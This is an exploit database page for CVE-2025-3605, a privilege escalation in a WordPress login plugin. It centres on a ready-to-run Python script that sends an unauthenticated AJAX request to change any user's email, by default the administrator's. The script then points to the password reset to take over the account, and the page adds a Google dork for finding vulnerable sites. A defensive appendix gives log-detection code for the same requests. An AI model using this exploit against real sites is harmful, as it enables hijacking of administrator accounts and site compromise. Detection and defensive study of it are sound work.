WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation

Exploit Details

Basic Information

Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation
Exploit ID: EDB-ID:52291
Type: exploitdb
Published: 2025-05-13
Modified: 2025-05-13

CVSS Information

CVSS Score: 9.8
Severity: CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-3605

Exploit Description

Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7…

Exploit Code

# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 – Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605

import argparse
import sys

import requests


def display_banner():
    # Raw string so the backslashes in the ASCII art are not treated as escapes.
    banner = r"""
_____ _____ ___ __ ___ ___ ____ __ __ ___
/ __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
\___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
"""
    print(banner)


def suppress_ssl_warnings():
    # Self-signed certificates are common on lab targets; silence the warning.
    requests.packages.urllib3.disable_warnings()


def initialize_session():
    new_session = requests.Session()
    new_session.verify = False
    new_session.headers.update({"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
    return new_session


def parse_input_args():
    parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
    parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
    parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
    parser.add_argument("--new_email", "-e", default="[email protected]", help="Email to change to (default: [email protected])")
    return parser.parse_args()


def generate_payload(user, email):
    # The request is sent with no session cookie and no nonce; the handler
    # trusts the caller-supplied user_id and applies the new email to it.
    return {
        "action": "flrblocksusersettingsupdatehandle",
        "user_id": user,
        "flr-blocks-email-update": email,
    }


def execute_exploit(session, target_url, payload):
    try:
        # rstrip avoids a double slash when the target is given with a trailing "/".
        return session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data=payload)
    except Exception as error:
        print(f"Request error: {error}")
        sys.exit(1)


def process_response(response):
    # admin-ajax.php answers "0" when no handler ran for the requested action,
    # so anything else on a 200 means the plugin's handler was reached.
    if response.status_code == 200 and response.text.strip() != "0":
        print(f"Exploit succeeded! Response: {response.text}")
        print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
    else:
        print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")


def run_exploit():
    display_banner()
    suppress_ssl_warnings()
    args = parse_input_args()
    session = initialize_session()
    payload = generate_payload(args.target_user, args.new_email)
    response = execute_exploit(session, args.target, payload)
    process_response(response)


if __name__ == "__main__":
    run_exploit()
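On the defensive side, the request the script builds is distinctive: a call to admin-ajax.php carrying action=flrblocksusersettingsupdatehandle and a caller-chosen user_id, sent without any WordPress login cookie. The following Python is an added example (not from the original exploit or the plugin) of the detection logic a SOC would run over reverse-proxy or WAF audit records that include the request body; the record layout (src, method, uri, cookie, body) and the sample requests are constructed for illustration and should be mapped onto your own log source. admin-ajax.php dispatches on $_REQUEST['action'], so the detector merges query-string and body parameters instead of looking only at POST bodies.

```python
"""Detection logic for attempts to exploit CVE-2025-3605 over HTTP request
records (reverse proxy / WAF audit log style).

Added example, not part of the original exploit or of the plugin. The record
layout (src, method, uri, cookie, body) and SAMPLE_REQUESTS are constructed
for illustration; map them onto your own log source.
"""
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "flrblocksusersettingsupdatehandle"  # action the exploit posts
EMAIL_FIELD = "flr-blocks-email-update"            # parameter carrying the new email


def is_logged_in(cookie_header: str) -> bool:
    """WordPress marks authenticated sessions with a wordpress_logged_in_<hash> cookie."""
    return any(c.strip().startswith("wordpress_logged_in_")
               for c in cookie_header.split(";"))


def request_params(record: Dict[str, str]) -> Dict[str, str]:
    """Merge query-string and body parameters (first value of each).

    admin-ajax.php dispatches on $_REQUEST['action'], so the action can arrive
    in either place; the exploit uses the POST body, but a detector should not
    rely on that.
    """
    params: Dict[str, str] = {}
    query = urlsplit(record.get("uri", "")).query
    for source in (query, record.get("body", "")):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(key, values[0])
    return params


def classify(record: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for requests that invoke the vulnerable action, else None."""
    path = urlsplit(record.get("uri", "")).path
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = request_params(record)
    if params.get("action") != VULN_ACTION:
        return None
    authed = is_logged_in(record.get("cookie", ""))
    # Unauthenticated calls to this action have no legitimate purpose: high.
    # Authenticated calls are what the handler exists for, but a client-chosen
    # user_id is exactly what the exploit abuses, so still surface them: medium.
    severity = "high" if not authed else "medium"
    return {
        "src": record.get("src", "?"),
        "severity": severity,
        "user_id": params.get("user_id", ""),
        "new_email": params.get(EMAIL_FIELD, ""),
        "authenticated": "yes" if authed else "no",
    }


def scan(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify over a batch of records and keep the findings."""
    return [f for f in (classify(r) for r in records) if f is not None]


# Constructed sample traffic (RFC 5737 documentation addresses), not captured data.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {   # what the exploit script sends: no cookie, victim user_id, attacker email
        "src": "203.0.113.7", "method": "POST", "uri": "/wp-admin/admin-ajax.php",
        "cookie": "",
        "body": f"action={VULN_ACTION}&user_id=1&{EMAIL_FIELD}=attacker%40example.com",
    },
    {   # logged-in user changing an email through the same action
        "src": "198.51.100.4", "method": "POST", "uri": "/wp-admin/admin-ajax.php",
        "cookie": "wordpress_logged_in_9f86d081=alice%7C1750000000%7Cabc; wp-settings-time-2=1",
        "body": f"action={VULN_ACTION}&user_id=2&{EMAIL_FIELD}=alice%40example.com",
    },
    {   # unrelated AJAX traffic, must not be flagged
        "src": "192.0.2.9", "method": "POST", "uri": "/wp-admin/admin-ajax.php",
        "cookie": "", "body": "action=heartbeat&_nonce=deadbeef",
    },
    {   # same action carried in the query string instead of the body
        "src": "192.0.2.10", "method": "GET",
        "uri": f"/wp-admin/admin-ajax.php?action={VULN_ACTION}&user_id=1",
        "cookie": "", "body": "",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The presence of a login cookie is only a coarse signal: the log does not tell you which user the cookie belongs to, so an authenticated request whose user_id does not match the session user cannot be distinguished here from a legitimate self-update. Correlating the finding with the site's user table, or with a later password-reset request for the same account, closes that gap.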
